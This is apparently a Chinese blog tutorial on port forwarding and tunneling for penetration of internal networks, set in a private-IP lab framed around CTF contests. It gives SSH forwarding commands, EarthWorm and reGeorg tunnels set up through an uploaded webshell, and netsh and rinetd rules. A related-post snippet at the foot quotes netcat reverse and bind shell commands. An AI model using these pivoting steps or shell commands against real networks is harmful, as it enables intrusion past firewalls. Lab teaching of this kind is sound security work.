web狗要懂的内网端口转发

最新推荐文章于 2024-09-07 10:23:57 发布
最新推荐文章于 2024-09-07 10:23:57 发布
阅读量1.8k 收藏 9
点赞数 1
分类专栏: 技术分享 工具分享 内网渗透

先区分正向代理和反向代理

(自己的理解)

A——B——C
A对C的请求,B作为代理,代替A去访问C,并将结果返回给A,则B是正向代理

B主动与A的8888端口建立连接,并将A:8888的访问转为对C:80的访问,结果返回给A,则B是反向代理

反向代理的好处:当AB之间有防火墙,不允许A连B,但是允许B连A

开始实验

A(root@192.168.168.1) (kali,具有完备的攻击环境)
B(msfadmin@192.168.168.2)
C(msfadmin@192.168.168.3)



 

实验一,利用ssh隧道,B作为正向代理,做动态端口转发

前提:知道B的ssh口令(常见于CTF的AWD中的渗透模式)
在A上运行

ssh -2 -D 2333 msfadmin@192.168.168.2

这条命令是将A本地的2333端口,与B的22端口建立socks连接,运行后需要输入B的ssh口令

测试,直接在A访问C的80端口,不过浏览器要侦听127.0.0.1:2333socks代理

测试,直接在A扫描C的所有端口,不过要调用proxychains,侦听127.0.0.1:2333

 

实验二,利用ssh隧道,B作为正向代理,进行单一的端口转发

A访问127.0.0.1:1111相当于访问C:80

A上运行

ssh -L 1111:192.168.168.3:80 msfadmin@192.168.168.2

A访问127.0.0.1:1111相当于访问192.168.168.3:80(C),中间需要msfadmin@192.168.168.2(B)来帮忙转发,需要输入B的ssh账号密码

 

 

A访问127.0.0.1:2222 相当于访问C:22

A上运行

ssh -L 2222:192.168.168.3:22 msfadmin@192.168.168.2

A访问127.0.0.1:2222相当于访问192.168.168.3:22(C),中间需要msfadmin@192.168.168.2(B)来帮忙转发,需要输入B的ssh账号密码


 

 

 

实验三 利用ssh隧道,B做反向代理,做单一的端口转发

A访问127.0.0.1:8888相当于访问C:80

先在A(kali)上生成ssh需要的host key

ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key

在B上运行

ssh -R 8888:192.168.168.3:80 root@192.168.168.1

B主动向A发起ssh连接,需要输入A的ssh账号口令

将来自(A)192.168.168.1:8888的请求,转化为对(C)192.168.168.3:80的请求,然后将结果通过ssh隧道,返回给A

 

A访问127.0.0.1:2222相当于访问C:22

在B上运行

ssh -R 2222:192.168.168.3:22 root@192.168.168.1


实验四,再多一级D(192.168.168.4),在A上打D

 

在B上运行两条命令

ssh -R 8888:127.0.0.1:4444 root@192.168.168.1
B作反向代理,将A:8888与B:4444打通ssh隧道

ssh -2 -D 4444 msfadmin@192.168.168.3
B将本地4444端口与C打通ssh隧道,C作正向代理

现在A就能以127.0.0.1:8888为socks代理,去访问D了,甚至扫描D

 

 

 

 

 

 

 

 

如果你只获得一个webshell,并没有ssh口令

强烈推荐 EarthWorm

可以用ew来建立正向代理、反向代理、多级级联,非常强大
旧版,已够用 http://rootkiter.com/EarthWorm/
新版,更新中,侧重shell管理 http://rootkiter.com/Termite/

利用ew,将B作为正向代理

用菜刀上传ew.zip到B上,并移动到tmp目录下

用菜刀的虚拟终端在B上执行



 

unzip ew.zip
file /sbin/init (查看linux位数)
chmod 777 ew_for_Linux32
./ew_for_Linux32 -s ssocksd -l 2333 (侦听0.0.0.0:2333)
netstat -pantu|grep 2333 (查看是否侦听成功)

 

 

在A上以B为代理,访问C

 

利用ew,将B作为反向代理

在A上执行

 

chmod 777 ./ew_for_linux64
./ew_for_linux64 -s rcsocks -l 1080 -e 2333

A侦听0.0.0.0:2333端口,并转发为0.0.0.0:1080端口

 

在B上执行

 

chmod 777 ew_for_Linux32
./ew_for_Linux32 -s rssocks -d 192.168.168.1 -e 2333

B反向连接A:2333端口

此时以A的1080端口为代理,就能直接打C了,实际渗透中,192.168.168.1常是一台公网服务器,然后kali再去连接公网的1080端口,但我这里仍然是在kali下演示

 

 

使用完ew,记得杀掉进程,可以ps+kill查杀,也可以粗暴点,直接kill 0

 

利用ew进行多级代理搭建

B上运行

./ew_for_Linux32 -s rcsocks -l 1080 -e 2333

侦听0.0.0.0:2333,流量转发到0.0.0.0:1080

C上运行

./ew_for_Linux32 -s rssocks -d 192.168.168.2 -e 2333

C反向连接B:2333端口

这样A上以B 192.168.168.2:1080为socks代理,可以直接对D进行渗透



 

可以再加一级

达到以192.168.168.1:1080为socks代理,能对D进行渗透

沟通B和C

B上运行
./ew_for_Linux32 -s rcsocks -l 1080 -e 2333
C上运行
./ew_for_Linux32 -s rssocks -d 192.168.168.2 -e 2333

B侦听0.0.0.0:2333端口,并转为0.0.0.0:1080端口
C反向连接B的2333端口

沟通A和B

A上运行
./ew_for_linux64 -s rcsocks -l 1080 -e 2333
B上运行
./ew_for_Linux32 -s lcx_slave -d 192.168.168.1 -e 2333 -f 127.0.0.1 -g 1080

A侦听0.0.0.0:2333端口,并转为0.0.0.0:1080端口
B反向连接A的2333端口,并把流量转发到本地的1080端口



 

 

 

reGeorg

https://github.com/sensepost/reGeorg
https://sensepost.com/discover/tools/reGeorg/
reGeorg利用webshell建立一个socks代理进行内网穿透,服务器必须支持aspx、php、jsp、js等web语言

菜刀连接192.168.168.2的webshell,上传tunnel.php和tunnel.nosocket.php到web根目录

在A(kali)上运行



 

python reGeorgSocksProxy.py -p 2333 http://192.168.168.2/tunnel.php
建立不了连接
python reGeorgSocksProxy.py -p 2333 http://192.168.168.2/tunnel.nosocket.php
成功建立连接

此时会利用192.168.168.2的web服务,与本机的kali的2333端口建立socks连接,现在就能在A上打C了

 

参考和推荐的文章

内网渗透随想 redrain写的
http://www.anquan.us/static/drops/tips-5234.html
内网渗透中转发工具总结
http://www.anquan.us/static/drops/tools-15000.html
【T00ls精华文】代理转发工具汇总分析
https://mp.weixin.qq.com/s/heSvLuJtdPyJfsKJVlZEhw
内网漫游之SOCKS代理大结局
https://www.anquanke.com/post/id/85494
ssh端口转发详解
https://www.cnblogs.com/-chaos/archive/2013/10/19/3378564.html
http://blog.csdn.net/a351945755/article/details/21785647
http://blog.csdn.net/qq_27446553/article/details/51981764

补充

使用Windows命令来实现端口转发

https://xianzhi.aliyun.com/forum/topic/2068

需以管理员身份运行cmd.exe

将本地3389端口转发到本地2333端口
netsh interface portproxy add v4tov4 listenaddress=192.168.168.2 listenport=2333 connectaddress=192.168.168.2 connectport=3389
不能是127.0.0.1,除了转发到本地的ip,也可以转发到远程的ip

作为中间人,将0.0.0.0:2333 的访问,转为对192.168.168.3:3389的访问
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=2333  connectaddress=192.168.168.3 connectport=3389 

查看规则
netsh interface portproxy show all
netsh interface portproxy dump

清空规则
netsh interface portproxy reset

删除规则
netsh interface portproxy delete v4tov4 listenport=2333 listenaddress=192.168.168.2

有需要可以添加防火墙规则
netsh advfirewall firewall add rule name="forwarded_RDPport_2333" protocol=TCP dir=in localip=192.168.168.2  localport=2333 action=allow

使用rinetd来进行端口转发

sudo apt-get install rinetd

vim /etc/rinetd.conf
0.0.0.0 2333 1.1.1.1 2333

sudo service rinetd restart

自启动
sudo vim /etc/rc.local
/usr/sbin/rinetd start



 

大方子
关注
专栏目录
53-1 内网代理3 - Netsh端口转发(推荐)
weixin_43263566的博客
07-07 209
这样,只需访问Windows Server 2012的 8080 端口,就可以间接访问Windows Server 2008的3389端口。在一个典型的场景中,如果我们位于公网无法直接访问内网Web服务器,可以利用中间的跳板机通过Netsh建立端口映射,使得通过访问跳板机公网地址的指定端口,等同于访问内网Web服务器的80端口。我这里就改成访问内网的3389端口,这里跳板机ip就是windows2012的ip,内网ip就是windows2008。,实现了内外网的端口转发功能。
什么是端口转发?路由器如何正确的设置端口转发和范围转发?(外网访问必备设置)
XiaoqiangClub的博客
06-13 1528
什么是端口转发?路由器如何正确的设置端口转发和范围转发?(外网访问必备设置)
2、Web狗要内网端口转发
Fly_鹏程万里
06-10 2757
这次XNUCA的决赛不会内网渗透吃了很大亏,团队赛第一天回来后恶补了一下端口转发,第二天总算是能解决链路问题,虽然最后还是被各位师傅吊打了区分正向代理和反向代理(自己的理解,可能有误)A——B——CA对C的请求,B作为代理,代替A去访问C,并将结果返回给A,则B是正向代理B主动与A的8888端口建立连接,并将A:8888的访问转为对C:80的访问,结果返回给A,则B是反向代理反向代理的好处:当AB...
内网隧道:端口转发
最新发布
8888的博客
09-07 1101
端口转发端口映射端口转发,有时被称为做隧道,是安全壳( SSH)为网络安全通信使用的一种方法简单来说,端口转发就是将 一个端口收到的流量转发到另一个端口端口映射是 NAT的一种,功能是把在公网的地址转成私有地址。简单来说,端口映射就是将一个端口映射 到另一个端口供其他人使用端口转发:只针对于机器的某个特定端口本次实验三种端口转发:LCXSSHNETSH。
WEB安全-端口转发
weixin_43815032的博客
09-02 383
在写端口转发知识之前,给大家分享一些正向代理和反向代理的知识 正向代理 一个位于客户端和原始服务器之间的服务器,为了从原始服务器取得内容,客户端向代理发送一个请求并制定目标(原始服务器),然后代理向原始服务器转发请求并将获得的内容返回给客户端,客户端才能使用正向代理。我们平时说的代理就是指正向代理。 ...
内网端口转发
路虽远,行将至。事虽难,做必达。
08-10 1116
在渗透过程中拿到主机权限后,下一步通常是进行内网横向,而企业内网在不出网的情况下,我们无法直接进行扫描、反弹shell等操作,这时候就需要搭建隧道来进行数据包转发,使我们能间接的与内网进行通信。...
通过iptables实现端口转发内网共享上网.docx
09-30
PREROUTING链是在路由之前要过的链,负责改变目的地址和(或端口),通常用在端口转发或者nat到内网的DMZ区。例如,我们的公网IP是60.1.1.1/24,位于Linux中的eth0,内网IP是10.1.1.1/24,位于Linux中的eth1,我们的...
端口映射端口转发的c#代码
04-27
端口映射与端口转发是网络通信中的关键技术,特别是在处理内网访问与网络安全时。C#作为.NET框架下的主要编程语言,提供了丰富的库和API来实现这些功能。在这个场景下,`Htran`是一个知名的端口映射和端口转发工具,...
内网端口转发是什么意思
03-27
内网端口转发是一种网络技术,它允许将外部网络的请求转发到内部网络中的某个设备或服务的特定端口上。这种技术通常用于企业和组织的网络中,以便远程访问内部网络中的资源,如Web服务器、数据库服务器等。通过内网...
内网端口转发代理
xiaolan458的专栏
04-30 1141
内网端口转发代理
内网端口转发及穿透-
jackjack博客
09-21 9308
内网端口转发及穿透 最近尝试了一些内网端口的转发和内网穿透,现在一起总结一下。 0x01 正向和反向代理 正向代理中,proxy和client同属一个LAN,对server透明; 反向代理中,proxy和server同属一个LAN,对client透明。 实际上proxy在两种代理中做的事都是代为收发请求和响应,不过从结构上来看正好左右互换了下...
内网端口转发 - 简单记录
fa1c4的blog
07-17 829
常见的端口流量转发工具 (1) SSH (2) EW (3) NetCat (4) LCX 常见目的 (1) 安全运维: 绕过堡垒机/防火墙限制, 建立TCP链接, 对内网服务器进行远程管理 (2) 内网渗透: 绕过堡垒机/防火墙限制, 实现对内网服务器的攻击 分类 (1) 本地转发 (2) 远程转发 (3) 动态转发 本地转发 本地主机开启端口转发功能, 需要在用户机执行 ssh -L 8866:196.168.10.1:23 -fN 196.168.10.2 示意图 远程转发 堡垒机开启端口转发功能
内网渗透】全网最详细的端口转发教程
TT小子的博客
06-22 3212
最近在真实环境测试和编写靶场实战教程时,总会遇到内网主机无法直接访问,需要通过转发端口、建立代理隧道等方式去访问,以方便后续进一步的横向渗透测试。本文章主要介绍一些端口转发工具的使用。
内网端口转发汇总
zrools的博客
10-14 2234
Linuxssh SA 服务器 CA 客户A CB 客户B CA通过SA访问CB服务,在CA上执行ssh USER@HOST_A -P HOST_A_SSH_PORT -L 127.0.0.1:LOCAL_PORT:HOST_B:HOST_B_PORT例:映射远程 MySQL端口至本地 端口 13306ssh root@1.2.3.4 -P 22 -L 127.0.0.1:13306:10.0.0.
内网穿透之端口转发
lionwerson的博客
12-09 2888
1.在后渗透阶段,如果我们拿下了一台服务器的权限,发现在服务器所属的内网中有一台开启了3389或者22端口的主机,但是无法直接连接,是因为目标服务器处在内网中或者没有联网,这个时候我们可以借助内网中另一台可以联网的服务器来作为代理服务器与连接开启3389的服务器进行连接。 2.实验环境: 系统 用户 桥接 192.168.0.0/24 NAT 192.168.11.0/24 win10 管理员 192.168.0.16 ubuntu1 lion1
内网端口转发小技巧
Amire0x的小乐园
11-30 1751
端口转发 NC 反向连接 kali开启监听 nc -lnvp 7777 目标返向连接 nc -e cmd.exe 192.168.95.128 7777 可以执行命令 正向连接 目标开启监听 nc -l -p 5555 -e cmd.exe kali连接 nc -nvv 192.168.95.12 5555 执行命令 lcx 外网无法访问内网,但内网可访问外网 client:转发自己的3389端口到远程端口7777上 lcx.exe -slave rhost
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值